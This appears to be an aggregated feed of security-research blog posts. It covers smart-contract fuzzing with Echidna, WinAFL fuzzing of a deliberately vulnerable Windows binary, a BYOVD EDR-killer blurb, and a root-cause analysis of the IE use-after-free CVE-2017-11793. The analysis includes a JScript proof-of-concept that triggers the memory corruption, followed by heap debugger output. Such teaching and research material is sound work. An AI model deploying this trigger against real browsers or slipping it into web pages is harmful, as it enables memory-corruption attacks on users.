In November of last year, I took the OffSec EXP-401 Advanced Windows Exploitation class (AWE) at Black Hat MEA. While most of the blog posts out of there focus on providing an OSEE exam review, this blog post aims to be a day-by-day review of the AWE course content. OffSec Exp-401 (AWE) During the first […]

The post OffSec EXP-401 Advanced Windows Exploitation (AWE) – Course Review appeared first on VoidSec.

The Art of Fuzzing – Smart Contracts

By: shogun
27 July 2023 at 00:38

Author: 2ourc3

Introduction to Smart Contract Auditing with Fuzzing

In this article we will look at auditing smart contracts for vulnerabilities through fuzzing. This article assumes that the reader has a decent understanding of Solidity and smart contracts, or is willing to look things up along the way.

The field is very young, which means there are plenty of fun and exciting vulnerabilities to find. There is also a financial incentive: smart contract bug bounties are very lucrative, because these bugs have the potential to cause significant financial losses.

Also, the technology itself is amazing. Smart contracts draw on a variety of techniques that are interesting to learn about, such as cryptography, distributed computing and state machines.

There are various methods to search for vulnerabilities in smart contracts – Manual code review, automated code review, fuzzing, symbolic execution, etc.

I have a strong interest in manual code review and dynamic analysis through fuzzing or symbolic execution. I decided to write this article to teach you how to fuzz a smart contract for the Ethereum blockchain using Echidna.

What is Echidna

Echidna is a weird creature that eats bugs and is highly electro-sensitive

Echidna is a fuzzer designed to test Ethereum smart contracts. What sets Echidna apart from other fuzzers is the fact that it focuses on breaking user-defined properties instead of looking for crashes. It uses sophisticated grammar-based fuzzing based on the contract ABI to falsify user-defined predicates or Solidity assertions.

The core Echidna functionality is an executable called Echidna, which takes a contract and a list of invariants (properties that should always remain true) as input. For each invariant, it generates random sequences of calls to the contract and checks if the invariant holds. If it can find some way to falsify the invariant, it prints the call sequence that does so.
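To make the idea of invariant-based fuzzing concrete, here is a toy Python model of the loop described above. It is not how Echidna is implemented: the Token class, its methods and the invariant are invented for this sketch, and real contracts are of course written in Solidity.

```python
import random


class Token:
    """Toy stand-in for a contract (hypothetical, not the article's Token.sol)."""

    def __init__(self):
        self.balance = 0

    def airdrop(self):
        self.balance = min(self.balance + 100, 1000)

    def consume(self):
        self.balance = max(self.balance - 50, 0)

    def backdoor(self):
        self.balance += 10_000


def invariant(token: Token) -> bool:
    """Property that should always hold: the balance never exceeds 1000."""
    return token.balance <= 1000


def fuzz(seed: int = 0, runs: int = 200, max_len: int = 10):
    """Generate random call sequences and return the first one that breaks the invariant."""
    rng = random.Random(seed)
    methods = ["airdrop", "consume", "backdoor"]
    for _ in range(runs):
        token = Token()  # fresh state for every sequence
        calls = []
        for _ in range(rng.randint(1, max_len)):
            name = rng.choice(methods)
            getattr(token, name)()
            calls.append(name)
            if not invariant(token):
                return calls  # falsifying call sequence
    return None


if __name__ == "__main__":
    print("Falsifying sequence:", fuzz())
```

In this toy model only backdoor() can push the balance above the limit, so any reported sequence ends with that call.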

Installing Echidna

The installation process is pretty straightforward:

# Installing Slither
pip3 install slither-analyzer --user

# Installing solc
sudo add-apt-repository ppa:ethereum/ethereum
sudo apt-get update
sudo apt-get install solc

Then download one of the latest releases of Echidna, extract the archive and profit.

Echidna Testing modes

Property Mode

Echidna properties are Solidity functions. A property must:

  • Have no arguments.
  • Return true if successful.
  • Have its name starting with echidna.

Echidna will:

  • Automatically generate arbitrary transactions to test the property.
  • Report any transactions that lead a property to return false or throw an error.
  • Discard side-effects when calling a property (i.e., if the property changes a state variable, it is discarded after the test).

Echidna requires a constructor without input arguments. If your contract needs specific initialization, you should do it in the constructor. The following contract demonstrates how to test a smart contract by writing a property. The smart contract we are going to test is Token.sol.

// Use inheritance to separate your contract from your properties:
contract TestToken is Token {
    function echidna_balance_under_1000() public view returns (bool) {
        return balances[msg.sender] <= 1000;
    }
}

You can run Echidna to test that condition using the following command: echidna testtoken.sol --contract TestToken

Echidna found that the property is violated if the backdoor function is called. More details in the docs.

Assertions

Assertions mode allows you to verify that a certain condition holds after executing a function. You can insert an assertion using either assert(condition) or a special event called AssertionFailed, like this:

event AssertionFailed(uint256);
....
if (condition) {
    emit AssertionFailed(value);
}

More details in the docs. You can also read an excellent blog post about assertions here.

dApptest

Using the “dapptest” testing mode, Echidna will report violations using certain functions following how dapptools and Foundry work:

  • This mode uses any function name with one or more arguments, which will trigger a failure if they revert, except in one special case. Specifically, if the execution reverts with the special reason “FOUNDRY::ASSUME”, then the test will pass (this emulates how the assume Foundry cheat code works).

Foundry is a smart contract development toolchain. You can learn more about it here: https://book.getfoundry.sh/. More information about choosing the right test method of Echidna can be found in the docs.

You should now have a good understanding of the basic usage of Echidna. However, I strongly encourage you to check the available documentation, since there are a lot of optimizations and advanced techniques you can benefit from.

Echidna hosts a series of tutorials and docs here.

Finding a target to fuzz

A good approach to find a target to fuzz is by searching for an interesting program on Immunefi. Keep in mind that while fuzzing is an automated process, you might still need to invest time in understanding the code and the project you wish to fuzz. Therefore, take the time to find a target that genuinely interests you and makes you feel comfortable spending time understanding the contract’s mechanics.

After searching on Immunefi and applying some filters, I have obtained a list of several potential targets.

I decided to focus on the Optimism project because I had already invested time in understanding it in the past. However, feel free to explore the possibilities based on your interests.

All smart contracts related to the Optimism project can be found on their Github, and the list of all deployed smart contracts in scope is available on the Bug Bounty page.

To successfully fuzz a target, one must comprehend how it functions, establish at least a basic threat model, and decide how to test its security. Before commencing the audit of a target, I always follow this process:

  • Information Gathering: Begin by exploring the project’s website, including the parent project if applicable, to familiarize yourself with the concept and gain a clear understanding of its purpose. Since good documentation is often scarce, take the time to thoroughly read any available documentation to leverage the valuable insights provided by the developers.
  • Code Review: There are various techniques for conducting an efficient code review. You can choose to follow the instruction flow, read it line by line, or use suitable tools that match your preferences. In this context, the primary focus of the code review is to identify fuzzable functions, rather than manually searching for vulnerabilities. I have opted to follow the instruction flow to gain a comprehensive understanding of the overall project.
  • Threat Modeling: Once you start reading the code and have a clear grasp of its functionality, document potential dangerous functions or sensitive data that you come across. Effective threat modeling helps you concentrate on relevant aspects during the code review process.

Information gathering

Optimism is described as follows on the official website: OP Mainnet is a fast, stable, and scalable L2 blockchain built by Ethereum developers, for Ethereum developers. Built as a minimal extension to existing Ethereum software, OP Mainnet’s EVM-equivalent architecture scales your Ethereum apps without surprises. If it works on Ethereum, it works on OP Mainnet at a fraction of the cost.

In other words, it is a network equivalent to Ethereum that you can use to spend less on gas fees while executing Ethereum-compatible contracts. It acts as a Layer 2, which means that it relies on a Layer 1 blockchain: Ethereum.

An Optimistic Rollup is a blockchain that piggybacks off of the security of another “parent” blockchain. Specifically, Optimistic Rollups take advantage of the consensus mechanism (like PoW or PoS) of their parent chain instead of providing their own. In OP Mainnet’s case, this parent blockchain is Ethereum. The process is described on the following page: https://community.optimism.io/docs/protocol/2-rollup-protocol/

More information about the fault-proof process is available here. Here is the list of the contracts involved in the Optimism roll-up process:

Other contracts and parts of the Optimism project are in scope, but since the goal is to keep this article short (already failed), we are not going to audit the whole code base and will instead focus on the part related to the roll-up process.

Code-Review

We now have a pretty good overview of what the project does, and we have listed all the contracts. It’s now time to dive into the code. Remember that the goal here isn’t to manually review everything, but rather to find what to fuzz and how to do it.

For the source code available on Github the process is pretty straightforward: simply click on the link and read it. However, deployed smart contracts are stored on-chain as bytecode. Etherscan offers a Contract tab where you can read the Solidity source of the contract, provided it has been verified, as follows:

Now we can start a more laborious step: analyze all the code snippets from all the contracts to find what to fuzz. An easy way to download all the contracts and dependencies at one address using Etherscan is to click on “Open In” then open it in Remix IDE. You can then download the entire project as a zip file.

You can also open the smart contract with “Open In” Blockscan IDE, which embeds a Visual Studio Code IDE in your web browser. Here we see how the contract is organized on the left and the actual code on the right:


This concludes the article. You are now able to analyze a code base by yourself, write your own property tests and use Echidna. You can also try Medusa, a promising fuzzer under development by the Crytic team.

It’s now your turn to find a target and run some fuzzing tests. See if you can find bugs in the wild, and happy hunting!

The post The Art of Fuzzing – Smart Contracts appeared first on Bushido Security.

The art of fuzzing: Windows Binaries

By: shogun
25 June 2023 at 17:42

Author: 2ourc3

Introduction

Today we are going to dive into grey-box fuzzing by testing closed-source Windows binaries. This type of fuzzing allows one to fuzz a target without having access to its source code. Why do this type of fuzzing? Since it requires more setup and more advanced skills, fewer people look for vulnerabilities this way or are able to find them. This increases the chances for you, the vulnerability researcher, to find new, undiscovered vulnerabilities.

To achieve this we will need to overcome several challenges:

  • Instrumenting the code.
  • Find a relevant function to fuzz.
  • Modifying/patching the binary to make it fuzzable.

There are plenty of solutions available to run fuzzing campaigns on Windows binaries; however, we are going to focus solely on WinAFL in this chapter. WinAFL offers three types of instrumentation:

  • Dynamic instrumentation via DynamoRIO – Dynamic instrumentation modifies the instructions of a program while the program is running.
  • Static instrumentation via Syzygy – Static instrumentation modifies the instructions of a program ahead of time, before it runs.
  • Hardware tracing via Intel PT – A hardware feature that asynchronously records program control flow.

While each method has its own pros and cons, we will focus today on dynamic instrumentation via DynamoRIO. See below a description of the workflow WinAFL + DynamoRIO will execute while fuzzing your target binary.

Compiling WinAFL

  1. If you are building with DynamoRIO support, download and build DynamoRIO sources or download DynamoRIO Windows binary package from https://github.com/DynamoRIO/dynamorio/releases
  2. If you are building with Intel PT support, pull third party dependencies by running git submodule update --init --recursive from the WinAFL source directory
  3. Open Visual Studio Command Prompt (or Visual Studio x64 Win64 Command Prompt if you want a 64-bit build). Note that you need a 64-bit winafl.dll build if you are fuzzing 64-bit targets and vice versa.
  4. Go to the directory containing the source
  5. Type the following commands. Modify the -DDynamoRIO_DIR flag to point to the location of your DynamoRIO cmake files (either full path or relative to the source directory).

For a 32-bit build:

mkdir build32
cd build32
cmake -G"Visual Studio 16 2019" -A Win32 .. -DDynamoRIO_DIR=..\path\to\DynamoRIO\cmake -DINTELPT=1
cmake --build . --config Release

For a 64-bit build:

mkdir build64
cd build64
cmake -G"Visual Studio 16 2019" -A x64 .. -DDynamoRIO_DIR=..\path\to\DynamoRIO\cmake -DINTELPT=1
cmake --build . --config Release

Build configuration options
The following cmake configuration options are supported:

  • -DDynamoRIO_DIR=..\path\to\DynamoRIO\cmake – Needed to build the winafl.dll DynamoRIO client
  • -DINTELPT=1 – Enable Intel PT mode. For more information see https://github.com/googleprojectzero/winafl/blob/master/readme_pt.md
  • -DUSE_COLOR=1 – color support (Windows 10 Anniversary edition or higher)
  • -DUSE_DRSYMS=1 – Drsyms support (use symbols when available to obtain -target_offset from -target_method). Enabling this has been known to cause issues on Windows 10 v1809, though there are workarounds, see #145

Find a target

Finding the right target to fuzz isn’t always easy. It’s all about finding software complex enough to be worth testing, but accessible enough for you to understand what to fuzz and which features are interesting.

One good strategy is to target software that is known to contain vulnerabilities and whose vendor is responsive in a disclosure program. A good way to find such targets is to look at the Zero Day Initiative website.

This section lists previously disclosed bugs, which can give you a good overview of which programs are tested and how responsive their vendors are. Here we see that vulnerabilities were disclosed for Netgear and D-Link products. There are tons of previously disclosed vulnerabilities on this website; it is up to you to search through them and find the target that interests you the most.

Since fuzzing a complex target requires some advanced skills, such as reverse engineering and understanding large code bases, we will focus on a binary target I created specifically for this course. It is a vulnerable file reader: it takes a file as input, copies its content into a buffer, and closes the file.

You can download the file here, password: “bushido” https://drive.google.com/file/d/1c-cOuzYbC-gOFW91a2EHKNpZTiPrVdBP/view?usp=sharing

Patching binary to allow fuzzing

Unfortunately, a lot of software uses some kind of dialog-box control flow, where the user is prompted to answer a question before a certain task is executed, such as “This file already exists. Do you want to overwrite it?”.

This makes the fuzzing process impossible, since it requires the user to interact with the dialog box, which prevents the fuzzer from running normally. This is why we are now going to look at how to patch a binary in order to make it fuzzable!

Download and install Ghidra, start the application, then create a project directory and project. Import vulnerable_reader.exe, click on “Options...” and enable “Load Local Libraries From Disk”.

After loading the libraries, you can start reversing by pressing Enter or double-clicking the file name. This will open an “Analyze” dialog box, which you can configure.

For this exercise there is no need to change anything; however, I invite you to explore the available options and what they do. After clicking OK you’ll see the disassembly of the binary. You’ll need to wait a bit while Ghidra analyzes the entire binary; you can find the progress bar at the bottom right of the screen:

If you save your program after the analysis, you won’t need to analyze it again in the future. This binary is quite small, but keep in mind that this won’t always be the case. I encourage you to save the analyzed program as a copy just after the analysis is performed.

Now that the analysis is done, we can look through the program. Investigating this binary is going to be quite easy since we already know one string used in the dialog box. Open Search > Program Text, enter “You clicked Yes!”, enable “All Fields” under “Fields” and “All Blocks” under “Block”, then click “Search All” and double-click the first finding in the results.

We can see there are two possible options: the function lets you either select Yes and close, or select No and close. This function serves no real purpose; however, it prevents the program from continuing its flow until you click, and consequently prevents you from fuzzing it.

One interesting piece of information to look at is the XREFs, which correspond to the locations where this function (FUN_00401000) is called. Here we can see that the function is called by FUN_00401130; let’s double-click it and see what this function is.

It seems that this function is basically our main function. It takes two parameters as arguments and passes them to the second function. The first function is the one responsible for the dialog box.

Let’s replace the instruction “CALL FUN_00401000” with a NOP instruction:

As you can see, there is now a bunch of “??” following our instruction. This is because the original instruction was longer than the NOP instruction (in hex: 90), so we need to replace the “??” bytes with NOP instructions too, in order to preserve the original instruction length and keep the following bytes decoding as valid instructions. More info: https://en.wikipedia.org/wiki/Data_structure_alignment
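The same patch can be expressed as a byte-level operation. The Python sketch below overwrites a whole instruction with NOP bytes; the sample bytes and offset are hypothetical (a 5-byte near CALL, opcode E8 followed by a 4-byte displacement), so check the real instruction length and file offset in Ghidra before patching an actual binary.

```python
NOP = 0x90  # single-byte x86 NOP opcode


def nop_out(image: bytes, offset: int, length: int) -> bytes:
    """Return a copy of image with `length` bytes at `offset` replaced by NOPs."""
    if offset < 0 or length < 0 or offset + length > len(image):
        raise ValueError("patch range is outside the image")
    patched = bytearray(image)
    # Overwrite every byte of the original instruction, not just the first one,
    # so no stray operand bytes are left behind.
    patched[offset:offset + length] = bytes([NOP]) * length
    return bytes(patched)


if __name__ == "__main__":
    # Hypothetical snippet: PUSH EBP; CALL rel32; RET
    code = bytes.fromhex("55e8aabbccddc3")
    print(nop_out(code, 1, 5).hex())
```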

The result must look like this:

Now export the program as a PE file: click File > Export Program, then select Original File and set the right path:

Let’s run the program and see if the dialog box happens again:

Bravo! Keep in mind that most programs require far more complex interactions, and this course isn’t about reverse engineering. However, a big aspect of running a successful fuzzing campaign consists of removing what makes the fuzzer slower, and the GUI is a big part of that. You should definitely have some interest in RE if you want to pursue research in fuzzing.

Function offset

WinAFL uses a technique to optimize the fuzzing process by mitigating the slow execution time associated with the exec syscall and the typical process startup procedure. Instead of re-initializing the target program for every fuzzing attempt, it employs a strategy inspired by the concept of a fork server.

The basic idea is to execute the program until it reaches the desired fuzzing point and to supply randomized inputs from there. By employing this approach, each subprocess handles only a single input, effectively circumventing the overhead associated with the exec syscall operation.

As a result, when fuzzing a program with WinAFL, if the desired fuzzing point is reached during the third call, for example, the performance remains unaffected. However, the significant advantage lies in reducing the overhead of fuzzing throughout the entire program, leading to more efficient and effective fuzzing sessions.

Here is a diagram that illustrates this process.

How to select a target function

The target function should do these things during its lifetime:

  1. Open the input file. This needs to happen within the target function so that you can read a new input file for each iteration as the input file is rewritten between target function runs.
  2. Parse it (so that you can measure coverage of file parsing)
  3. Close the input file. This is important because if the input file is not closed WinAFL won’t be able to rewrite it.
  4. Return normally (So that WinAFL can “catch” this return and redirect execution. “returning” via ExitProcess() and such won’t work)
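The four requirements above can be pictured with a small Python model. It is only a conceptual sketch, not WinAFL’s implementation: target_function and persistent_loop are made-up names, and the “parsing” is reduced to counting bytes.

```python
import os
import tempfile


def target_function(path: str) -> int:
    """Toy target: open the input, parse it, close it, return normally."""
    with open(path, "rb") as handle:  # 1. open the input file
        data = handle.read()          # 2. parse it (here: just read the bytes)
    # 3. the file is closed when the 'with' block ends
    return len(data)                  # 4. return normally (no exit call)


def persistent_loop(inputs, iterations_before_restart: int = 500):
    """Call the target repeatedly, rewriting the same input file between calls."""
    results = []
    fd, path = tempfile.mkstemp(suffix=".txt")
    os.close(fd)
    try:
        for data in inputs[:iterations_before_restart]:
            # The harness can only rewrite the file because the target closed it.
            with open(path, "wb") as handle:
                handle.write(data)
            results.append(target_function(path))
    finally:
        os.remove(path)
    return results


if __name__ == "__main__":
    print(persistent_loop([b"hello", b"", b"AAAA" * 8]))
```

If the target kept the file open or exited the process instead of returning, the loop could not feed it the next input.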

How to find the virtual offset of the function

  • Static analysis with tools like Ghidra and radare2
  • Debugging the code with WinDBG or x64dbg (Setting up breakpoints and analyzing the parameters of functions at runtime)
  • Use auxiliary tools like API monitors, process monitors, and coverage tools like ProcMon

Find offset via Static Analysis with Ghidra

The binary contains some strings, one of them is “Failed to open file”, let’s click the Search menu then click “Program Text” and look for this sentence:

Let’s click search all and examine the result:

Let’s double click the first occurrence in the Namespace FUN_00401060

Remember that the execution flow we are looking for is: open the file > read it > close the file > return to normal execution. Let’s investigate whether this flow happens in the pseudo code of the function. Simplified, it gives us:

void __cdecl FUN_00401060(int argc, int argv)
{
  uint openResult;
  uint readResult;
  WCHAR fileContentBuffer[6]; // Buffer to store file content
  uint localVariable;

  localVariable = DAT_0041c040 ^ (uint)&stack0xfffffffc;

  if (argc < 2) {
    FUN_00401130((int)s_Usage:_%s_<filename>_0041c000); // Print usage message
  }
  else {
    openResult = FID_conflict:__open(*(char **)(argv + 4), 0x8000); // Open file specified in argv[1]
  
    if ((int)openResult < 0) {
      FUN_00401130((int)s_Failed_to_open_file:_%s_0041c018); // Print error message if file opening fails
    }
    else {
      while (readResult = FUN_00406348(openResult, fileContentBuffer, 10), 0 < (int)readResult) {
        FUN_00401130((int)&DAT_0041c034); // Print file contents
      }
      FUN_00407b70(openResult); // Close the file
    }
  }
  FUN_0040116a(localVariable ^ (uint)&stack0xfffffffc); // Some additional function call
  return;
}

Sounds like a match! Now let’s find the offset of this function. It’s pretty straightforward: right-click on the function and show its bytes. We see that the address of the function is 0x00401060 and the base address is 0x00400000, so the function offset is 0x01060.
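The offset is simply the function’s virtual address minus the image base. A short Python check of that arithmetic, using the function address from Ghidra and assuming an image base of 0x00400000 (the helper name is made up):

```python
def function_offset(function_va: int, image_base: int) -> int:
    """Return the offset of a function from the start of its module."""
    if function_va < image_base:
        raise ValueError("function address is below the image base")
    return function_va - image_base


if __name__ == "__main__":
    offset = function_offset(0x00401060, 0x00400000)
    print(f"0x{offset:05x}")
```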

Ghidra CheatSheet: https://ghidra-sre.org/CheatSheet.html

Prepare environment for fuzzing

Fuzzing binaries is quite a resource-demanding task. Here are a few things you can do to prepare your environment to run a fuzzing campaign smoothly:

  • Disabling automatic debugging
  • Disabling AV scanning

Optimization

Having a good corpus of inputs is a very important aspect of fuzzing. WinAFL lets you minimize your corpus with winafl-cmin.py. Examples of use:

  • Typical use
    winafl-cmin.py -D D:\DRIO\bin32 -t 100000 -i in -o minset -covtype edge -coverage_module m.dll -target_module test.exe -target_method fuzz -nargs 2 -- test.exe @@
  • Dry-run, keep crashes only with 4 workers with a working directory:
    winafl-cmin.py -C --dry-run -w 4 --working-dir D:\dir -D D:\DRIO\bin32 -t 10000 -i in -i C:\fuzz\in -o out_mini -covtype edge -coverage_module m.dll -target_module test.exe -target_method fuzz -nargs 2 -- test.exe @@
  • Read from specific file
    winafl-cmin.py -D D:\DRIO\bin32 -t 100000 -i in -o minset -f foo.ext -covtype edge -coverage_module m.dll -target_module test.exe -target_method fuzz -nargs 2 -- test.exe @@
  • Read from specific file with pattern
    winafl-cmin.py -D D:\DRIO\bin32 -t 100000 -i in -o minset -f prefix-@@-foo.ext -covtype edge -coverage_module m.dll -target_module test.exe -target_method fuzz -nargs 2 -- test.exe @@
  • Typical use with static instrumentation
    winafl-cmin.py -Y -t 100000 -i in -o minset -- test.exe @@

winafl-cmin.py can take a while to run, so be patient.
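To give an intuition for what corpus minimization does, here is a toy greedy selection in Python. It is a simplified sketch and not the algorithm winafl-cmin.py actually implements; the file names and edge identifiers are invented.

```python
def minimize_corpus(coverage: dict) -> list:
    """Pick a small set of files that together cover every observed edge.

    `coverage` maps a file name to the set of edge ids that file triggers.
    """
    remaining = set().union(*coverage.values())
    kept = []
    while remaining:
        # Greedy choice: the file covering the most still-uncovered edges.
        # Iterating over sorted names makes ties deterministic.
        best = max(sorted(coverage), key=lambda name: len(coverage[name] & remaining))
        kept.append(best)
        remaining -= coverage[best]
    return kept


if __name__ == "__main__":
    sample = {
        "a.txt": {1, 2},
        "b.txt": {2, 3, 4},
        "c.txt": {1, 2, 3, 4},
        "d.txt": {5},
    }
    print(minimize_corpus(sample))
```

Files whose coverage is fully contained in already selected files (a.txt and b.txt in the sample) add nothing new and are dropped.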

Running a campaign

We have patched the binary to make it fuzzable and found the offset of the function we want to test, so now let’s have fun and run the fuzzer! WinAFL offers different options; let’s enumerate them:

  • t – Timeout per fuzzing iteration. If the iteration does not complete in time, WinAFL restarts the program.
  • D – DynamoRIO path.
  • coverage_module – Module(s) for which coverage is recorded.
  • target_module – Module containing the target function.
  • target_offset – Virtual offset of the function to be fuzzed from the start of the module.
  • fuzz_iterations – Number of fuzzing iterations before the program is restarted.
  • call_convention – Calling convention of the target function: stdcall, cdecl or thiscall.
  • nargs – Number of arguments the fuzzed function takes. The this pointer (used in the thiscall calling convention) is also considered an argument.

WARNING: We built two versions of WinAFL, remember? Use the correct version of WinAFL for the target you are looking to fuzz! Here we are going to use the 32-bit version!

Since our binary is meant to open and read from a text file, create an “in” folder and put a text file with a simple phrase in it.

Ok now let’s cd into WinAFL_32 build directory and run the following command:

afl-fuzz.exe -i in -o out -t 10000 -D C:\WinAFL\DynamoRIO\bin32 -- -fuzz_iterations 500 -coverage_module vulnerable_reader.exe -target_module vulnerable_reader.exe -target_offset 0x01060 -nargs 3 -call_convention thiscall -- vulnerable_reader.exe @@
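When running several campaigns it can help to assemble this command line programmatically. The Python sketch below only rebuilds the argument list used above from the options listed earlier; the function and parameter names are my own, and the default values are copied from this tutorial.

```python
def build_afl_fuzz_command(
    target_exe: str,
    target_offset: int,
    dynamorio_dir: str,
    in_dir: str = "in",
    out_dir: str = "out",
    timeout_ms: int = 10000,
    fuzz_iterations: int = 500,
    nargs: int = 3,
    call_convention: str = "thiscall",
) -> list:
    """Return the afl-fuzz.exe argument list for a DynamoRIO-based campaign."""
    return [
        # Fuzzer options
        "afl-fuzz.exe", "-i", in_dir, "-o", out_dir,
        "-t", str(timeout_ms), "-D", dynamorio_dir,
        "--",
        # Instrumentation options
        "-fuzz_iterations", str(fuzz_iterations),
        "-coverage_module", target_exe,
        "-target_module", target_exe,
        "-target_offset", f"0x{target_offset:05x}",
        "-nargs", str(nargs),
        "-call_convention", call_convention,
        "--",
        # Target command line; @@ is replaced by the input file path
        target_exe, "@@",
    ]


if __name__ == "__main__":
    cmd = build_afl_fuzz_command(
        "vulnerable_reader.exe", 0x1060, r"C:\WinAFL\DynamoRIO\bin32"
    )
    print(" ".join(cmd))
```

The resulting list can be passed to subprocess.run() on a machine where WinAFL and DynamoRIO are installed.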

If everything went well, you should see this beauty appear:

Now it’s a matter of time. Let the fuzzer run for a few minutes and you should see a crash appear.

Analyze crash test

Here WinAFL found a crash really quickly. I purposely designed the binary to be very simple to crash so that this tutorial is fun to follow. As you can see, WinAFL names the crash file with the status and type of crash. You can find the crash files in your out directory > crashes.

It’s obviously a Stack BoF, since the program was purposely designed for that. However, let’s open it in WinDBG and do a root cause analysis of the crash.

Start WinDBG and click on File > Launch Executable (advanced) then put the path of the vulnerable binary as “Executable” and the crash_id file as “Arguments” then click on “Go” to run the program.

As you can see, WinDBG immediately reports that a stack buffer overrun was detected. If you want to learn more about root cause analysis with WinDBG, I suggest this nice video: https://hardik05.wordpress.com/2021/11/23/analyzing-and-finding-root-cause-of-a-vulnerability-with-time-travel-debugging-with-windbg-preview/

Exploitation

This course is not meant to teach you exploitation; however, there are plenty of very good resources on this topic, and I thought it would be interesting to list some here:

The post The art of fuzzing: Windows Binaries appeared first on Bushido Security.

Reverse Engineering Terminator aka Zemana AntiMalware/AntiLogger Driver

By: voidsec
15 June 2023 at 14:25

Recently, a threat actor (TA) known as SpyBot posted a tool, on a Russian hacking forum, that can terminate any antivirus/Endpoint Detection & Response (EDR/XDR) software. IMHO, all the hype behind this announcement was utterly unjustified as it is just another instance of the well-known Bring Your Own Vulnerable Driver (BYOVD) attack technique: where a […]

The post Reverse Engineering Terminator aka Zemana AntiMalware/AntiLogger Driver appeared first on VoidSec.

ANALYSIS OF MICROSOFT IE11 SCRIPTING ENGINE MEMORY CORRUPTION VULNERABILITY (CVE-2017-11793) – Part-1

22 May 2021 at 16:58

On December 18 2017, Ivan Fratric (@ifsecure) from Google Project Zero disclosed a Use-After-Free (UAF) vulnerability in Microsoft Internet Explorer 11. A proof-of-concept (PoC) exploit can be found here on the Google Project Zero website and also on Exploit-DB. CVE-2017-11793 was assigned to this vulnerability.

A UAF vulnerability occurs when an object is created, free-ed and then re-used or referenced again.

Though this vulnerability affects IE 11, I could reproduce it on IE 8 on Windows 7 SP1 machine. We will analyse this vulnerability in this blog.

Following is the PoC for this vulnerability:

<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">

var o1 = {toJSON:function(){
  //alert('o1');
  // Object is created here
  return [o2];
}}

var o2 = {toJSON:function(){
  //alert('o2');
  // Object is free-ed here
  CollectGarbage();

  // Free-ed/Vulnerable Object is re-used/referenced here
  return 'x';
}}

JSON.stringify(o1);
</script>

Crash Analysis:

When this page is accessed with a debugger attached, we see the following crash:

As we can see, a crash occurred because EIP is pointing to an instruction which is trying to access/dereference invalid memory at an offset of 0x18 bytes from ESI.

As we discussed earlier, a Use After Free vulnerability exists when an object is created, it is then free-ed later on and then the application tries to access that object again after it’s been free-ed.
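The create / free / re-use sequence can be modelled in a few lines of Python. This is only a toy model with invented names: it mimics the way page heap flags an access to a free-ed block, and has nothing to do with the real jscript or ntdll allocators.

```python
class UseAfterFree(Exception):
    """Raised when a free-ed block is accessed."""


class ToyHeap:
    """Tiny heap model that tracks whether each block is busy or free-ed."""

    def __init__(self):
        self._blocks = {}
        self._next_addr = 0x1000

    def alloc(self, size: int) -> int:
        addr = self._next_addr
        self._next_addr += size  # addresses are never reused in this model
        self._blocks[addr] = {"size": size, "state": "busy"}
        return addr

    def free(self, addr: int) -> None:
        self._blocks[addr]["state"] = "free-ed"

    def read(self, addr: int, offset: int = 0) -> int:
        block = self._blocks[addr]
        if block["state"] != "busy":
            raise UseAfterFree(f"access to free-ed block 0x{addr:x}+0x{offset:x}")
        if not 0 <= offset < block["size"]:
            raise IndexError("offset outside the block")
        return 0  # block contents are not modelled


if __name__ == "__main__":
    heap = ToyHeap()
    obj = heap.alloc(0x3C)    # Step 1: object is created
    heap.free(obj)            # Step 2: object is free-ed
    try:
        heap.read(obj, 0x18)  # Step 3: object is used again
    except UseAfterFree as err:
        print(err)
```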

Let’s analyse all these three steps:

Step 1: Object Creation:

After analysing memory allocations and free’s, I noticed that, the statement return [o2]; causes memory allocation. That is when the object is created. We can confirm that by carefully putting a breakpoint when the object is created and run !heap -p -a eax command:

address 0bcaefc0 found in
_DPH_HEAP_ROOT @ a11000
in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                             bc6123c:          bcaefc0               3c -          bcae000             2000
73f48e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77ef0c96 ntdll!RtlDebugAllocateHeap+0x00000030
77eaae1e ntdll!RtlpAllocateHeap+0x000000c4
77e53cce ntdll!RtlAllocateHeap+0x0000023a
76e79d45 msvcrt!malloc+0x0000008d
76e7b0d7 msvcrt!operator new+0x0000001d
6ff4cabf jscript!ArrayObj::Create+0x0000000e  
6ff8e5b3 jscript!CScriptRuntime::Run+0x0000177a
6ff55d7d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
6ff55cdb jscript!ScrFncObj::Call+0x0000008d
6ff55870 jscript!NameTbl::InvokeInternal+0x000002b4
6ff54f84 jscript!VAR::InvokeByDispID+0x0000017f
6ffd2108 jscript!JSONApplyFilters+0x00000137
6ffd1c6e jscript!JSONStringifyObject+0x0000008d
6ffd1a43 jscript!JsJSONStringify+0x000003a2
6ff5599a jscript!NatFncObj::Call+0x00000106
6ff55870 jscript!NameTbl::InvokeInternal+0x000002b4

So, looking at the call stack during object creation and at the UserSize column, it’s clear that 0x3c bytes of memory were allocated at address 0x0bcaefc0 by jscript!ArrayObj::Create, which (through msvcrt!operator new) called msvcrt!malloc. msvcrt!malloc then called ntdll!RtlAllocateHeap, which in turn called ntdll!RtlpAllocateHeap. It also looks like jscript!ArrayObj::Create is the constructor of this object.

Step 2: Object is free-ed

After monitoring allocations and frees for a while, I noticed that the object in question (0x0bcaefc0) is free-ed when CollectGarbage() is called. This is the same address/User Pointer (0x0bcaefc0) that ESI contains at the time of the crash.

We can run the !heap -p -a esi command to display the call stack that free-ed the User Pointer (0x0bcaefc0):

0:005> !heap -p -a esi
    address 0bcaefc0 found in
    _DPH_HEAP_ROOT @ a11000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    bc6123c:          bcae000             2000
    73f490b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77ef1464 ntdll!RtlDebugFreeHeap+0x0000002f
    77eaab3a ntdll!RtlpFreeHeap+0x0000005d
    77e53472 ntdll!RtlFreeHeap+0x00000142
    76e798cd msvcrt!free+0x000000cd
    6ff67977 jscript!NativeErrorProtoObj<16>::`vector deleting destructor'+0x00000019
    6ff66c67 jscript!NameTbl::SetMasterVariant+0x00000054
    6ff671d8 jscript!VAR::Clear+0x0000003f
    6ff66e46 jscript!GcContext::Reclaim+0x000000b6
    6ff643e9 jscript!GcContext::CollectCore+0x00000123
    6ffc83f0 jscript!JsCollectGarbage+0x0000001d
<!-- snip --->


